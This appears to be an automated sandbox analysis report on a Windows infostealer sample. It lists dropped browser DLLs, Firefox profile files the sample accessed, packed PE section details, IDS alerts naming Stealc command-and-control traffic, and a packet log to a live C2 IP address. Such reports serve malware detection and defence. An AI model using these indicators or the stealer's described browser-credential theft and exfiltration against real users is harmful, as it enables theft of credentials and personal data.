Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.947942329429601
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'852'416 bytes
MD5:	49f94ca1e283413adc5163d5ffa2c92a
SHA1:	b5b123b0b33c407a398e9b1a07376198525f9c46
SHA256:	883cd6bc778f914d4f19fc3d70fbf5da5bf5e65c8d7f08bb7b5a85eaa80bdd9b
SHA512:	ce625df75124fd7b0bec99f1d2af64393602113d3035d402223c4d52b6b9fe5b8028c359af990ed4fb338f9c9ad90b819f5d0427ceba3ab5dbadafdc4a21ee84
SSDEEP:	49152:sB9t5JSKpkZmHqvR002XAGWwN7s8xHE+n:s/tVpkkIC02QGW0g8e
TLSH:	9A85339AF53134BEEDE370B456C1B367B2F5BCA0CAA9A07C416AC13DC07B77840A6954
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa9d000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F37808CEFFAh

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	fd9d82f8db5ccc3f25b6320d3a9111e1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29f000	0x200	6cd91f113ee77a33c0b3ff0b164fcee0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bxaxjwdv	0x4fd000	0x19f000	0x19e200	b61dec397e0d32aba97508aef14de0bd	False	0.9948616246604286	data	7.953604046148972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rqgsodtp	0x69c000	0x1000	0x400	6a4a8a331b85a286bc71090a1ce04b20	False	0.8369140625	data	6.374445100399527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x69d000	0x3000	0x2200	317aad88f91f879b65af808165ece59e	False	0.06135110294117647	DOS executable (COM)	0.8138389831910012	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T18:38:10.820665+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:11.080940+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:11.129692+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-10-03T18:38:11.351514+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:11.359567+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-10-03T18:38:12.515053+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:12.994174+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:20.085129+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:21.210579+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:21.885080+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:22.505528+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:24.291808+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-03T18:38:24.858050+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 18:38:09.424350977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:09.434828043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:09.434925079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:09.435070038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:09.440983057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:10.233720064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:10.233802080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:10.237787008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:10.464080095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:10.559427977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:10.559519053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:10.561151028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:10.561177969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:10.820581913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:10.820664883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:10.842526913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:10.848325968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.080837965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.080940008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.083156109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.083246946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.124443054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.129692078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.351234913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.351362944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.351381063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.351514101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.351641893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.351641893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.351985931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.352004051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.352047920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.352066994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.352755070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.352777004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.352819920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.352845907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.354515076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.359566927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.593728065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.593831062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.621181965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.621270895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:11.626147985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.626352072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.626549006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.626576900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.626604080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.626636028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:11.626662970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.514806986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:12.515053034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:12.772311926 CEST	49730	80	192.168.2.4	185.215.113.37
